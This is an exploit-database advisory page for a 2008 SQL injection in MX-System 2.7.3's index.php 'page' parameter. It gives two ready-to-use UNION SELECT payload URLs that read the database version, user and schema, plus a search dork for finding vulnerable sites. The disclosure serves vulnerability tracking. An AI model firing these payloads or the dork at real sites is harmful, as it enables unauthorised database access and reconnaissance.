header-logo
Suggest Exploit
vendor:
MX-System
by:
cOndemned
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: MX-System
Affected Version From: 2.7.2003
Affected Version To: 2.7.2003
Patch Exists: NO
Related CWE: N/A
CPE: a:mx-system:mx-system:2.7.3
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

MX-System 2.7.3 (index.php page) Remote SQL Injection Vulnerability

A vulnerability exists in MX-System 2.7.3 which allows an attacker to inject arbitrary SQL commands via the 'page' parameter in the 'index.php' page. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL commands. This can be done by sending a request with the 'page' parameter set to -1 union select 1,2,3,4,5,concat_ws(char(58),version(),user(),now())/* or -1 union select 1,2,3,4,5,concat(table_name,char(58),column_name)+from+information_schema.columns/*. This will generate an error page containing the requested information.

Mitigation:

Developers should ensure that user-supplied input is properly sanitized and validated before being used in SQL queries.
Source

Exploit-DB raw data:

Name   : MX-System 2.7.3 (index.php page) Remote SQL Injection Vulnerability
Author : cOndemned
Dork   : intext:Powered by MX-System 2.7.3
Greetz : ZaBeaTy, str0ke, doctor, Avantura </3

PoC :

    http://[target]/[path]/index.php?page=-1+union+select+1,2,3,4,5,concat_ws(char(58),version(),user(),now())/*
    http://[target]/[path]/index.php?page=-1+union+select+1,2,3,4,5,concat(table_name,char(58),column_name)+from+information_schema.columns/*
    
    SQL query will generate error page containing requested informations.

# milw0rm.com [2008-05-20]

Navigation

Suggest Exploit

Services By CQR